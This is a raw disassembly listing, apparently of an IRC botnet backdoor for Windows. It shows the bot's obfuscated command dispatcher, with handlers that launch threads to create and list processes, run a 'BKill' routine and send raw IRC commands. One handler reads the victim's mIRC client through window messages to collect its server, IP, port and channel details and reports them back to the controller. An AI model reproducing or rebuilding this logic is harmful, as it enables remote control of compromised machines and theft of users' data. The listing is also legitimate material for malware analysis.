; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_40A938+1AE5�j
push offset dword_43AB8C
loc_40C45E: ; CODE XREF: sub_40A938+1B18�j
; sub_40A938+1B1F�j
lea eax, [ebp+var_57C20]
push eax
call dword_437090 ; lstrcatA
cmp [ebp+arg_14], edi
jnz short loc_40C48A
cmp [ebp+arg_18], edi
jnz short loc_40C493
lea eax, [ebp+var_57C20]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 0Ch
loc_40C48A: ; CODE XREF: sub_40A938+1B36�j
cmp [ebp+arg_18], edi
jz loc_4148CF
loc_40C493: ; CODE XREF: sub_40A938+1B3B�j
lea eax, [ebp+var_57C20]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD0E
jmp loc_40D299
; ---------------------------------------------------------------------------
loc_40C4AA: ; CODE XREF: sub_40A938+1AAE�j
push dword ptr [ebx]
push offset aI7atf_8Tag1 ; "i7Atf.8/tag1"
call edi ; dword_437174
test eax, eax
jnz loc_40C549
cmp dword_457014, eax
jnz short loc_40C506
cmp [ebp+arg_14], eax
mov edi, offset aSSS_0 ; "%s %s (%s)"
mov ebx, offset aUDneTzo8s_omqd ; "u/DnE/tzo8s.OMQDW1DERIa/"
jnz short loc_40C4F3
cmp [ebp+arg_18], eax
jnz short loc_40C4FC
push offset dword_6763F8
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
xor eax, eax
loc_40C4F3: ; CODE XREF: sub_40A938+1B98�j
cmp [ebp+arg_18], eax
jz loc_4148CF
loc_40C4FC: ; CODE XREF: sub_40A938+1B9D�j
push offset dword_6763F8
jmp loc_40B2D2
; ---------------------------------------------------------------------------
loc_40C506: ; CODE XREF: sub_40A938+1B89�j
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aNeuf6qyoiMdAn1 ; "NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1"
jnz short loc_40C531
cmp [ebp+arg_18], eax
jnz short loc_40C53A
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
xor eax, eax
loc_40C531: ; CODE XREF: sub_40A938+1BDB�j
cmp [ebp+arg_18], eax
jz loc_4148CF
loc_40C53A: ; CODE XREF: sub_40A938+1BE0�j
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
jmp loc_4146CD
; ---------------------------------------------------------------------------
loc_40C549: ; CODE XREF: sub_40A938+1B7D�j
push dword ptr [ebx]
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
call edi ; dword_437174
test eax, eax
jnz loc_40C628
push 4
call sub_423756
xor edi, edi
pop ecx
cmp eax, edi
mov [ebp+arg_C], eax
jle short loc_40C575
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_40C575: ; CODE XREF: sub_40A938+1C31�j
mov eax, [ebp+arg_10]
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aS2maintenance_ ; "%s /2Maintenance./2"
push 4
mov [ebp+var_2638], eax
call sub_4233DE
add esp, 0Ch
mov [ebp+var_25B4], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_2638]
push edi
push eax
push offset sub_41EB23
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_25B4]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_4148CF
cmp [ebp+arg_14], 0
mov ebx, offset aSS_ ; "%s %s."
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
jnz short loc_40C5F6
cmp [ebp+arg_18], 0
jnz short loc_40C5FC
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40C5F6: ; CODE XREF: sub_40A938+1CA1�j
cmp [ebp+arg_18], 0
jz short loc_40C61A
loc_40C5FC: ; CODE XREF: sub_40A938+1CA7�j
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
jmp short loc_40C61A
; ---------------------------------------------------------------------------
loc_40C612: ; CODE XREF: sub_40A938+1CE9�j
push 32h
call dword_43718C ; Sleep
loc_40C61A: ; CODE XREF: sub_40A938+1CC2�j
; sub_40A938+1CD8�j
cmp [ebp+var_257C], 0
jz short loc_40C612
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40C628: ; CODE XREF: sub_40A938+1C1C�j
push dword ptr [ebx]
push offset aUaxwg1w8vsp0qr ; "UaxWg1w8vSP0QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_40C641
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push 4
jmp loc_412BDB
; ---------------------------------------------------------------------------
loc_40C641: ; CODE XREF: sub_40A938+1CFB�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437174
test eax, eax
jz loc_4146DD
push dword ptr [ebx]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call edi ; dword_437174
test eax, eax
jz loc_4146DD
push dword ptr [ebx]
push offset a47ff020f_0_ ; "47Ff/020f.0."
call edi ; dword_437174
test eax, eax
jnz loc_40C77A
mov eax, [ebp+arg_10]
push offset dword_443EFC
mov [ebp+var_CE4], eax
mov eax, [ebp+arg_14]
mov [ebp+var_C58], eax
mov eax, [ebp+arg_18]
mov [ebp+var_C54], eax
mov eax, [ebp+arg_20]
mov [ebp+var_C50], eax
lea eax, [ebp+var_CE0]
push eax
call dword_4370A4 ; lstrcpyA
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
push ebx
push offset aSBkillThread_ ; "%s BKill thread."
push 1
call sub_4233DE
add esp, 0Ch
cmp [ebp+arg_14], 0
mov [ebp+var_C60], eax
mov edi, offset aSBkillS ; "%s BKill %s"
jnz short loc_40C6EB
cmp [ebp+arg_18], 0
jnz short loc_40C6F1
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40C6EB: ; CODE XREF: sub_40A938+1D96�j
cmp [ebp+arg_18], 0
jz short loc_40C705
loc_40C6F1: ; CODE XREF: sub_40A938+1D9C�j
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
loc_40C705: ; CODE XREF: sub_40A938+1DB7�j
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_CE4]
push edi
push eax
push offset sub_41F02F
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_C60]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_40C76D
loc_40C736: ; CODE XREF: sub_40A938+1FF7�j
; sub_40A938+212F�j ...
cmp [ebp+arg_14], 0
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz loc_40C154
cmp [ebp+arg_18], 0
jnz loc_414849
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push ebx
push edi
push dword ptr [esi+0Ch]
jmp loc_40C149
; ---------------------------------------------------------------------------
loc_40C765: ; CODE XREF: sub_40A938+1E3B�j
push 32h
call dword_43718C ; Sleep
loc_40C76D: ; CODE XREF: sub_40A938+1DFC�j
cmp [ebp+var_C4C], edi
jz short loc_40C765
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40C77A: ; CODE XREF: sub_40A938+1D36�j
push dword ptr [ebx]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call edi ; dword_437174
test eax, eax
jnz loc_40CA8F
xor ecx, ecx
cmp [ebx+4], ecx
jnz short loc_40C7D1
cmp [ebp+arg_14], ecx
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40C7BB
cmp [ebp+arg_18], ecx
loc_40C7A4: ; CODE XREF: sub_40A938+1F53�j
; sub_40A938+1F93�j
jnz short loc_40C7C5
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40C7BB: ; CODE XREF: sub_40A938+1E67�j
; sub_40A938+1F4A�j ...
cmp [ebp+arg_18], 0
loc_40C7BF: ; CODE XREF: sub_40A938+2068�j
jz loc_4148CF
loc_40C7C5: ; CODE XREF: sub_40A938:loc_40C7A4�j
; sub_40A938+2048�j
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
loc_40C7CB: ; CODE XREF: sub_40A938+483F�j
; sub_40A938+496D�j ...
push edi
jmp loc_4146CB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A938+1E58�j
mov eax, [ebp+arg_14]
mov edx, [ebp+arg_20]
mov [ebp+var_428], eax
mov eax, [ebp+arg_18]
mov [ebp+var_424], eax
cmp eax, ecx
mov [ebp+var_42C], edx
lea eax, [ebp+var_4D8]
jnz short loc_40C7FB
push dword ptr [esi+0Ch]
jmp short loc_40C7FD
; ---------------------------------------------------------------------------
loc_40C7FB: ; CODE XREF: sub_40A938+1EBC�j
push dword ptr [esi]
loc_40C7FD: ; CODE XREF: sub_40A938+1EC1�j
push eax
call dword_4370A4 ; lstrcpyA
xor eax, eax
mov [ebp+var_448], eax
mov [ebp+var_444], eax
mov [ebp+var_440], eax
mov eax, [ebp+arg_10]
mov [ebp+var_4DC], eax
push dword ptr [ebx+4]
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
call edi ; dword_437174
test eax, eax
jnz short loc_40C860
push 2
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40C848
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_40C848: ; CODE XREF: sub_40A938+1F04�j
mov [ebp+var_448], 1
mov ebx, [ebx+8]
mov [ebp+var_450], ebx
jmp loc_40C8E5
; ---------------------------------------------------------------------------
loc_40C860: ; CODE XREF: sub_40A938+1EF5�j
push dword ptr [ebx+4]
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
call edi ; dword_437174
test eax, eax
jnz short loc_40C89C
mov ebx, [ebx+8]
cmp ebx, eax
jnz short loc_40C890
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40C7BB
cmp [ebp+arg_18], eax
jmp loc_40C7A4
; ---------------------------------------------------------------------------
loc_40C890: ; CODE XREF: sub_40A938+1F3B�j
mov [ebp+var_444], 1
jmp short loc_40C8D9
; ---------------------------------------------------------------------------
loc_40C89C: ; CODE XREF: sub_40A938+1F34�j
push dword ptr [ebx+4]
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
call edi ; dword_437174
test eax, eax
jnz loc_40C957
mov ebx, [ebx+8]
test ebx, ebx
jnz short loc_40C8D0
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40C7BB
cmp [ebp+arg_18], eax
jmp loc_40C7A4
; ---------------------------------------------------------------------------
loc_40C8D0: ; CODE XREF: sub_40A938+1F7B�j
xor eax, eax
inc eax
mov [ebp+var_444], eax
loc_40C8D9: ; CODE XREF: sub_40A938+1F62�j
mov [ebp+var_454], ebx
mov [ebp+var_440], eax
loc_40C8E5: ; CODE XREF: sub_40A938+1F23�j
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
push ebx
push offset aSProcs ; "%s Procs"
push 2
call sub_4233DE
add esp, 0Ch
mov [ebp+var_458], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_4DC]
push edi
push eax
push offset sub_41F7B0
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_458]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_40C736
cmp [ebp+var_420], edi
jnz loc_4148CF
loc_40C941: ; CODE XREF: sub_40A938+2018�j
push 32h
call dword_43718C ; Sleep
cmp [ebp+var_420], 0
jz short loc_40C941
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40C957: ; CODE XREF: sub_40A938+1F70�j
push dword ptr [ebx+4]
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
cmp [ebx+8], eax
jnz short loc_40C9A5
cmp [ebp+arg_14], eax
mov edi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40C99D
cmp [ebp+arg_18], eax
jnz loc_40C7C5
push ebx
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
xor eax, eax
loc_40C99D: ; CODE XREF: sub_40A938+2043�j
cmp [ebp+arg_18], eax
jmp loc_40C7BF
; ---------------------------------------------------------------------------
loc_40C9A5: ; CODE XREF: sub_40A938+2034�j
xor ecx, ecx
inc ecx
cmp [ebx+0Ch], eax
jz short loc_40C9B3
mov [ebp+var_448], ecx
loc_40C9B3: ; CODE XREF: sub_40A938+2073�j
cmp [ebp+arg_3C], eax
jz short loc_40C9BE
mov [ebp+var_444], ecx
loc_40C9BE: ; CODE XREF: sub_40A938+207E�j
push dword ptr [ebx+8]
lea eax, [ebp+var_63D4]
push eax
call sub_429A33
xor edi, edi
pop ecx
cmp [ebp+arg_34], edi
pop ecx
jz short loc_40CA11
cmp [ebp+arg_38], 0
mov bl, 5Fh
jz short loc_40C9E1
mov bl, [ebp+arg_38]
loc_40C9E1: ; CODE XREF: sub_40A938+20A4�j
push [ebp+var_454]
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40CA11
loc_40C9F1: ; CODE XREF: sub_40A938+20D7�j
mov eax, [ebp+var_454]
add eax, edi
cmp [eax], bl
jnz short loc_40CA00
mov byte ptr [eax], 20h
loc_40CA00: ; CODE XREF: sub_40A938+20C3�j
push [ebp+var_454]
inc edi
call sub_4292D0
cmp edi, eax
pop ecx
jb short loc_40C9F1
loc_40CA11: ; CODE XREF: sub_40A938+209C�j
; sub_40A938+20B7�j
mov ebx, offset aAl_N0kenp20 ; "Al./N0Kenp20"
lea eax, [ebp+var_63D4]
push ebx
push offset aSCreateProcess ; "%s Create process thread."
push 2
mov [ebp+var_454], eax
call sub_4233DE
add esp, 0Ch
mov [ebp+var_458], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_4DC]
push edi
push eax
push offset sub_41F46D
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_458]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_40C736
cmp [ebp+var_420], edi
jnz loc_4148CF
loc_40CA79: ; CODE XREF: sub_40A938+2150�j
push 32h
call dword_43718C ; Sleep
cmp [ebp+var_420], 0
jz short loc_40CA79
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40CA8F: ; CODE XREF: sub_40A938+1E4D�j
push dword ptr [ebx]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call edi ; dword_437174
test eax, eax
jnz loc_40CC42
push 0Ch
call sub_423756
test eax, eax
pop ecx
mov ebx, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
jle short loc_40CACD
push ebx
push 0Ch
push 0
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_42358B
add esp, 20h
loc_40CACD: ; CODE XREF: sub_40A938+2177�j
cmp dword_457F48, 0
jnz short loc_40CAEE
call sub_429ACC
cdq
mov ecx, 0BBFFh
idiv ecx
add edx, 66h
mov dword_45641C, edx
jmp short loc_40CAFA
; ---------------------------------------------------------------------------
loc_40CAEE: ; CODE XREF: sub_40A938+219C�j
movzx eax, word_443982
mov dword_45641C, eax
loc_40CAFA: ; CODE XREF: sub_40A938+21B4�j
and dword_456418, 0
mov edi, offset dword_45620C
push 104h
push edi
push 0
call dword_437178 ; GetModuleFileNameA
push 103h
push offset dword_443990
push offset dword_456310
call sub_429C40
and dword_4564AC, 0
push 7Fh
push offset dword_443EF4
push offset dword_456420
call sub_429C40
mov eax, [ebp+arg_14]
push edi
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
mov dword_454A28, eax
mov eax, [ebp+arg_18]
push dword_45641C
mov dword_454A30, eax
mov eax, [ebp+arg_20]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
mov dword_454A2C, eax
mov eax, [ebp+arg_10]
push ebx
push offset aSSOnSISS_ ; "%s %s on %s: %i, %s: %s."
push 0Ch
mov dword_4564B0, eax
call sub_4233DE
add esp, 38h
mov dword_456414, eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push offset dword_456208
push offset sub_402CBA
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, dword_456414
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_40C736
jmp short loc_40CBC8
; ---------------------------------------------------------------------------
loc_40CBC0: ; CODE XREF: sub_40A938+2297�j
push 32h
call dword_43718C ; Sleep
loc_40CBC8: ; CODE XREF: sub_40A938+2286�j
cmp dword_4564AC, 0
jz short loc_40CBC0
xor eax, eax
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
cmp [ebp+arg_14], eax
jnz short loc_40CC11
cmp [ebp+arg_18], eax
jnz short loc_40CC1B
cmp [ebp+arg_1C], eax
jnz loc_4148CF
push dword_456414
push dword_45641C
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push edi
push ebx
push offset aSSOnSIThreadNu ; "%s %s on %s: %i, thread number: %i."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 20h
loc_40CC11: ; CODE XREF: sub_40A938+22A3�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40CC1B: ; CODE XREF: sub_40A938+22A8�j
push dword_456414
push dword_45641C
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push edi
push ebx
push offset aSSOnSIThreadNu ; "%s %s on %s: %i, thread number: %i."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
jmp loc_412BF1
; ---------------------------------------------------------------------------
loc_40CC42: ; CODE XREF: sub_40A938+2162�j
push dword ptr [ebx]
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
call edi ; dword_437174
test eax, eax
jnz short loc_40CC65
mov ecx, [ebp+arg_10]
call sub_41DA92
mov ecx, [ebp+arg_10]
push eax
call sub_41CE5F
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40CC65: ; CODE XREF: sub_40A938+2315�j
push dword ptr [ebx]
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
call edi ; dword_437174
test eax, eax
jnz short loc_40CC94
mov eax, [ebx+4]
test eax, eax
jz short loc_40CCCE
mov ebx, [ebx+8]
test ebx, ebx
jnz short loc_40CC85
mov ebx, offset byte_454A34
loc_40CC85: ; CODE XREF: sub_40A938+2346�j
mov ecx, [ebp+arg_10]
push ebx
push eax
call sub_41CFD5
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40CC94: ; CODE XREF: sub_40A938+2338�j
push dword ptr [ebx]
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_40CCB6
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_40CCCE
mov ecx, [ebp+arg_10]
push ebx
call sub_41D000
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40CCB6: ; CODE XREF: sub_40A938+2367�j
push dword ptr [ebx]
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
call edi ; dword_437174
test eax, eax
jnz loc_40CD82
mov eax, [ebx+4]
test eax, eax
jnz short loc_40CCD8
loc_40CCCE: ; CODE XREF: sub_40A938+233F�j
; sub_40A938+236E�j
mov edi, offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_40CCD8: ; CODE XREF: sub_40A938+2394�j
push eax
lea eax, [ebp+var_443A0]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 2
pop edi
cmp [ebp+arg_4], edi
jle short loc_40CD2F
loc_40CCF5: ; CODE XREF: sub_40A938+23F5�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40CD29
push eax
lea eax, [ebp+var_15D70]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_15D70]
push 2710h
push eax
lea eax, [ebp+var_443A0]
push eax
call sub_429910
add esp, 18h
loc_40CD29: ; CODE XREF: sub_40A938+23C2�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40CCF5
loc_40CD2F: ; CODE XREF: sub_40A938+23BB�j
lea eax, [ebp+var_443A0]
push eax
push [ebp+arg_10]
call sub_41D027
cmp [ebp+arg_14], 0
pop ecx
pop ecx
mov edi, offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
mov ebx, offset aSSentIrcRawS_ ; "%s Sent IRC raw: \"%s\"."
jnz short loc_40CD6D
cmp [ebp+arg_18], 0
jnz short loc_40CD77
lea eax, [ebp+var_443A0]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_40CD6D: ; CODE XREF: sub_40A938+2416�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40CD77: ; CODE XREF: sub_40A938+241C�j
lea eax, [ebp+var_443A0]
jmp loc_40B033
; ---------------------------------------------------------------------------
loc_40CD82: ; CODE XREF: sub_40A938+2389�j
push dword ptr [ebx]
push offset aM1d_716jg1r1 ; "M1d.716Jg1r1"
call edi ; dword_437174
test eax, eax
jnz loc_40D14C
mov eax, [ebx+4]
test eax, eax
jnz loc_40D0B2
mov edi, offset aMirc ; "mIRC"
push eax
push edi
call dword_456F24 ; FindWindowA
test eax, eax
mov [ebp+arg_4], eax
jz loc_40D075
push edi
xor edi, edi
push 1000h
push edi
push 4
push edi
push 0FFFFFFFFh
call dword_4370B8 ; CreateFileMappingA
push edi
push edi
push edi
push 0F001Fh
push eax
mov [ebp+arg_68], eax
call dword_437040 ; MapViewOfFile
mov [ebp+arg_C], eax
push 10h
lea eax, [ebp+var_314]
push edi
push eax
call sub_429690
push offset aVersion ; "$version"
push [ebp+arg_C]
call sub_429A33
add esp, 14h
mov ebx, 4C9h
push edi
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
mov edi, offset aS_5 ; "%s"
lea eax, [ebp+var_314]
push edi
push 10h
push eax
call sub_429AEE
push 10h
lea eax, [ebp+var_2E4]
push 0
push eax
call sub_429690
push offset off_4416A8
push [ebp+arg_C]
call sub_429A33
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_2E4]
push edi
push 10h
push eax
call sub_429AEE
push 9Fh
lea eax, [ebp+var_2C20]
push 0
push eax
call sub_429690
push offset aServer_0 ; "$server"
push [ebp+arg_C]
call sub_429A33
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_2C20]
push edi
push 9Fh
push eax
call sub_429AEE
push 10h
push 0
lea eax, [ebp+var_304]
push eax
call sub_429690
push offset aServerip ; "$serverip"
push [ebp+arg_C]
call sub_429A33
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_304]
push edi
push 10h
push eax
call sub_429AEE
push 8
lea eax, [ebp+var_58]
push 0
push eax
call sub_429690
push offset aPort_0 ; "$port"
push [ebp+arg_C]
call sub_429A33
add esp, 24h
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_58]
push edi
push 8
push eax
call sub_429AEE
push 2710h
lea eax, [ebp+var_18480]
push 0
push eax
call sub_429690
push offset aChan0 ; "$chan(0)"
push [ebp+arg_C]
call sub_429A33
add esp, 24h
xor edi, edi
inc edi
push 0
push edi
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_174]
push 10h
push eax
call sub_429AEE
lea eax, [ebp+var_174]
push eax
call sub_42A030
add esp, 10h
cmp eax, edi
jl loc_40D010
loc_40CF82: ; CODE XREF: sub_40A938+26D2�j
push edi
push offset aChanI ; "$chan(%i)"
push [ebp+arg_C]
call sub_429A33
add esp, 0Ch
push 0
push 1
push ebx
push [ebp+arg_4]
call dword_456F7C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_18480]
push eax
call sub_42A510
lea eax, [ebp+var_174]
push eax
call sub_42A030
add esp, 0Ch
cmp edi, eax
jge short loc_40CFD6
lea eax, [ebp+var_18480]
push offset asc_4413F8 ; ", "
push eax
call sub_42A510
pop ecx
pop ecx
loc_40CFD6: ; CODE XREF: sub_40A938+2689�j
lea eax, [ebp+var_174]
push eax
call sub_42A030
cmp edi, eax
pop ecx
jnz short loc_40CFFA
lea eax, [ebp+var_18480]
push offset dword_43AB8C
push eax
call sub_42A510
pop ecx
pop ecx
loc_40CFFA: ; CODE XREF: sub_40A938+26AD�j
lea eax, [ebp+var_174]
inc edi
push eax
call sub_42A030
cmp edi, eax
pop ecx
jle loc_40CF82
loc_40D010: ; CODE XREF: sub_40A938+2644�j
lea eax, [ebp+var_18480]
cmp [ebp+arg_18], 0
push eax
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_304]
push eax
lea eax, [ebp+var_2C20]
push eax
lea eax, [ebp+var_314]
push eax
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSUserIsRunning ; "%s User is running mIRC v %s, Connected"...
jnz short loc_40D054
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
jmp short loc_40D05E
; ---------------------------------------------------------------------------
loc_40D054: ; CODE XREF: sub_40A938+270D�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
loc_40D05E: ; CODE XREF: sub_40A938+271A�j
add esp, 28h
push [ebp+arg_C]
call dword_437048 ; UnmapViewOfFile
push [ebp+arg_68]
call dword_437044 ; CloseHandle
jmp short loc_40D099
; ---------------------------------------------------------------------------
loc_40D075: ; CODE XREF: sub_40A938+2478�j
cmp [ebp+arg_14], 0
jnz short loc_40D099
cmp [ebp+arg_18], 0
jnz short loc_40D0A3
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSClientNotOpen ; "%s Client not open."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40D099: ; CODE XREF: sub_40A938+273B�j
; sub_40A938+2741�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40D0A3: ; CODE XREF: sub_40A938+2747�j
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSClientNotOpen ; "%s Client not open."
jmp loc_41467E
; ---------------------------------------------------------------------------
loc_40D0B2: ; CODE XREF: sub_40A938+2460�j
push eax
lea eax, [ebp+var_2B80]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 2
pop edi
cmp [ebp+arg_4], edi
jle short loc_40D109
loc_40D0CF: ; CODE XREF: sub_40A938+27CF�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40D103
push eax
lea eax, [ebp+var_1AB90]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_1AB90]
push 104h
push eax
lea eax, [ebp+var_2B80]
push eax
call sub_429910
add esp, 18h
loc_40D103: ; CODE XREF: sub_40A938+279C�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40D0CF
loc_40D109: ; CODE XREF: sub_40A938+2795�j
lea eax, [ebp+var_2B80]
push eax
call sub_426C22
test eax, eax
pop ecx
lea eax, [ebp+var_2B80]
push eax
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
jz short loc_40D12D
push offset aSCommandSentS ; "%s Command sent: \"%s\""
jmp short loc_40D132
; ---------------------------------------------------------------------------
loc_40D12D: ; CODE XREF: sub_40A938+27EC�j
push offset aSClientNotOp_0 ; "%s Client not open or found: \"%s\""
loc_40D132: ; CODE XREF: sub_40A938+27F3�j
; sub_40A938+2941�j ...
cmp [ebp+arg_18], 0
jnz loc_4146CB
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
jmp loc_4146D5
; ---------------------------------------------------------------------------
loc_40D14C: ; CODE XREF: sub_40A938+2455�j
push dword ptr [ebx]
